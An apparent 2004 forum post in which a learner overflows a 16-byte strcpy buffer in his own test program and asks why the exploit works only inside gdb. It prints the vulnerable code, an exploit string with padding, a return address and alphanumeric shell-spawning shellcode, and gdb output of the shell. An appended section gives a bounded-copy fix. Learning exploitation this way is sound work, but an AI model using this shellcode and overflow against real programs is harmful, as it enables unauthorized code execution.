cgibreak (n00b)
Joined: 12 Oct 2003 Posts: 20
Posted: Sat Apr 03, 2004 1:57 am Post subject: my exploit only works in a gdb environment
I made a simple little program to see if I could exploit it with a buffer overflow:

```c
#include <stdio.h>
#include <string.h>   /* for strcpy() */

int main(int argc, char **argv)
{
    char buf[16];
    strcpy(buf, argv[1]); // kinda obvious :D  (unbounded copy into a 16-byte buffer)
    printf("%s\n", buf);
    return 0;
}
```
I eventually got a working exploit string for this:
```c
// padding to get up to the return address
"hhhhhhhhhhhhhhhhhhhhhhhhhhhh"
// changed return addr
"\xf0\xf4\xff\xbf"
// sexy looking shellcode i found on the net
// (object of return address)
"LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5E"
"CfPDVUajcX0Dob0TodjdY0LohfhmNfXf1Dol0topjYY0Loq0"
"toq0totjJX0Dou0tou0TovjFX0Dow0towjhXfRhnKshhBabi"
"vERSvT29"
```
I can get this to work in gdb:

```text
(gdb) run $'<snip>'
Starting program: /home/cgibreak/programming/hackme/hackme $'<snip>'
<snip>
sh-2.05b$
```
Anyways, my problem is when I run it on the command line. It just segfaults. Is this a stack-randomization thing that is disabled in gdb? What could be causing this?

Thanks
EDIT:
Looked at propolice, even more confused.
[url]http://www.usenix.org/events/sec01/full_papers/frantzen/frantzen_html/node30.html[/url]
It says that it places a random "canary" in between the buffer and the return address. That would explain why I had to go through extra bytes to get to the return address, but what really freaks me out is that even when I use -fno-stack-protector the same string still works in gdb!
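For contrast with the post's program, here is an added example (not the poster's code) of the same `main()` shape with the unbounded `strcpy()` into the 16-byte buffer replaced by a bounded copy that rejects over-long input; `copy_arg` and `hardened_main` are names chosen for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 16

/* Bounded replacement for the strcpy() in the original program.
 * Returns 0 and copies src (with its NUL) into dst when it fits;
 * returns -1 and leaves dst as an empty string when it would not,
 * so an over-long argv[1] can never run past the end of buf. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {            /* need room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Same shape as the original main(), but checks argc and the input
 * length instead of trusting argv[1]. Returns the exit status. */
int hardened_main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof buf - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}

int main(int argc, char **argv)
{
    return hardened_main(argc, argv);
}
```

Run with the 28-byte padding string from the post as the argument and the hardened build exits with status 1 instead of crashing.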